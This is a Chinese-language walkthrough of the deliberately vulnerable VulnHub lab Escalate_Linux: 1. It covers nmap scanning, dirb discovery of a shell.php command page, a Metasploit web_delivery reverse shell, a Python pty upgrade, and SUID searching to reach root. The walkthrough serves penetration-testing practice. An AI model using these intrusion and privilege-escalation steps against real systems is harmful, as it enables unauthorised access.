靶机下载地址:Escalate_Linux: 1 ~ VulnHub
靶机简介:Escalate_Linux - 有意开发的易受攻击的 Linux 虚拟机。这台机器的主要重点是学习Linux 利用后(权限提升)技术
一、信息收集
扫描局域网内存活的主机
nmap -sP 192.168.43.0/24


发现靶机开启http服务,我们尝试进入一下

进入发现默认Apache界面,我们扫描一下网站后台php文件
dirb http://192.168.43.229/ -X .php

发现网站后台有一个shell.php文件,我们进入一下

提示使用一下cmd命令

二、渗透测试
1.打开msfconsole漏洞测试平台

2.搜索web_delivery漏洞攻击模块
search web_delivery

3.使用exploit/multi/script/web_delivery模块
use exploit/multi/script/web_delivery

4.查看需配置的参数
show options

5.我们将目标地址和本地地址都设为攻击机IP,进行反弹shell

6.运行
run

我们将这段代码放进burpsuite 中进行url编码

复制出下面的编码放进网站url中执行
sessions -i 1



成功拿到shell,我们现在是user用户尝试提权为root
我们使用python实现交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'

查找执行SUID命令
find / -perm -u=s -type f 2>/dev/null

发现user3下有个shell,我们运行测试一下

提权成功